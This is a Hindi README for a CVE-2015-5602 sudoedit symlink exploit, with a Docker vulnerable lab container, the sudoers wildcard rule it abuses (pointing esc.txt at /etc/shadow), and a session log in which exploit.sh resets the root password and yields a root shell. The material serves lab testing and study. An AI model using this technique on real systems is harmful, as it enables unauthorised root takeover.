
Sudo <= 1.8.14 स्थानीय विशेषाधिकार उन्नयन और कमजोर कंटेनर
Sudo (su "do") सिस्टम प्रशासक को कुछ उपयोगकर्ताओं (या उपयोगकर्ताओं के समूह) को रूट के रूप में कुछ (या सभी) कमांड चलाने की क्षमता देने की अनुमति देता है, साथ ही सभी कमांड और तर्कों को लॉग करता है।
अपने परीक्षण के लिए संवेदनशील वातावरण सेटअप करने के लिए आपको Docker स्थापित करना होगा, और बस निम्नलिखित कमांड चलाएं:
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602
और यह कम उपयोगकर्ता विशेषाधिकारों के साथ एक इंटरैक्टिव शेल उत्पन्न करेगा।
बग sudoedit में पाया गया था, जो पूर्ण पथ की जांच नहीं करता है यदि वाइल्डकार्ड दो बार उपयोग किया जाता है (जैसे /home/*/*/esc.txt), यह एक दुर्भावनापूर्ण उपयोगकर्ता को esc.txt वास्तविक फ़ाइल को किसी भिन्न स्थान (जैसे /etc/shadow) के लिए एक प्रतीकात्मक लिंक से बदलने की अनुमति देता है।
इस मुद्दे का सफलतापूर्वक शोषण करने से हमलावर फाइलों में हेरफेर कर सकता है और सिमलिंक हमलों के माध्यम से होस्ट सिस्टम पर रूट विशेषाधिकार प्राप्त कर सकता है।
इस लक्ष्य का शोषण करने के लिए बस चलाएं:
./exploit.sh
यदि आप इस संवेदनशील इमेज का उपयोग कर रहे हैं, तो आप बस चला सकते हैं:
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
(root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password:
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#
यह दोष Daniel Svartman द्वारा पाया गया था।
यह या पिछला प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (t0kx) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाले किसी भी नुकसान के लिए उत्तरदायी नहीं हूं। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इन प्रोग्रामों का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) t0kx की जिम्मेदारी नहीं है।